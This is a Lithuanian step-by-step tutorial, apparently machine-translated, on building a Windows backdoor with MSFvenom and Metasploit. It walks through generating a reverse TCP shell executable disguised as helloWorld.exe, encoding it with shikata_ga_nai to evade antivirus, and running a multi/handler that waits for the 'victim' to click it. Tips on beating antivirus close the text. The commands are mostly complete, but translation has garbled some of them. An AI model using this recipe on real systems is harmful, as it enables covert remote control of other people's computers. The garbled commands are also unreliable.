Užpakalinės durys naudojamos saugumo mechanizmams apeiti, dažnai slapta ir dažniausiai neaptinkamai. Naudojant „MSFvenom“, „msfpayload“ir „msfencode“derinį, galima sukurti užpakalines duris, kurios vėl prisijungia prie užpuoliko, naudojant atvirkštinio apvalkalo TCP. Norėdami sukurti užpakalines duris, turite pakeisti savo kenkėjiškų programų parašą, kad išvengtumėte bet kokios antivirusinės programinės įrangos. Užbaikite šį projektą poroje kompiuterių, prie kurių turite prieigą, ir sužinosite daugiau apie kompiuterių saugumą ir tai, kaip veikia tokios užpakalinės durys.
Žingsniai
Žingsnis 1. Paleiskite „Kali“ir įjunkite terminalo konsolę
Žingsnis 2. Įveskite ifconfig, kad būtų parodyta sąsaja ir patikrintas jūsų IP adresas
Žingsnis 3. Įveskite msfvenom -l koduotuvus, kad būtų parodytas koduotojų sąrašas
Kaip kodavimo priemonę naudosite x86/shikata_ga_nai
4 veiksmas. Įveskite „msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe
- -a x86 -platforma „Windows“nurodo naudoti architektūrą.
- -p windows/shell/reverse_tcp nurodo naudingąsias apkrovas, kurias reikia įterpti.
- LHOST žymi klausytojo IP adresą.
- LPORT žymi klausytojo prievadą.
- -b "\ x00" reiškia, kad būtų išvengta blogo simbolio (nulinių baitų).
- -e x86/shikata_ga_nai žymi kodavimo įrenginio pavadinimą.
- -f exe> helloWorld.exe žymi formato išvestį.
5 veiksmas. Norėdami suaktyvinti „Metasploit“, įveskite msfconsole
Dabar jūs sukūrėte savo galines duris. Kai auka spustelės helloWorld.exe, įterpta apvalkalo naudingoji apkrova bus suaktyvinta ir užmegztas ryšys su jūsų sistema. Norėdami gauti ryšį, turite atidaryti „Metasploit“daugiafunkcinį valdiklį ir nustatyti naudingąsias apkrovas
Žingsnis 6. Įveskite use exploit/multi/handler
Žingsnis 7. Įveskite set payload windows/shell/reverse_tcp
Žingsnis 8. Norėdami patikrinti modulį, įveskite rodymo parinktis
Žingsnis 9. Įveskite rinkinį LHOST 192.168.48.129
„LHOST“žymi klausytojo IP adresą
10 veiksmas. Įveskite rinkinį LPORT 4444
„LPORT“žymi klausytojo prievadą
Žingsnis 11. Įveskite „Run“ir palaukite ryšio nuo aukos mašinos
Žingsnis 12. Palaukite, kol auka spustelės helloWorld.exe
Tada būsite sėkmingai prisijungę prie aukos mašinos.
Patarimai
- Naudojant -i MSFvenom, bus parodytos kodavimo iteracijos. Kartais daugiau iteracijų gali padėti išvengti AV programinės įrangos.
- Jūs išmokote sukurti užpakalines duris ir užkoduoti naudodami MSFvenom, tačiau šis metodas neveiks puikiai prieš kai kurias šių dienų AV programinę įrangą. To priežastis yra MSFvenom vykdymo šablonai. AV pardavėjai pridėjo statinį šių šablonų parašą ir tiesiog jų ieško. Šios problemos sprendimas yra naudoti kitą vykdymo šabloną arba skirtingus įrankius.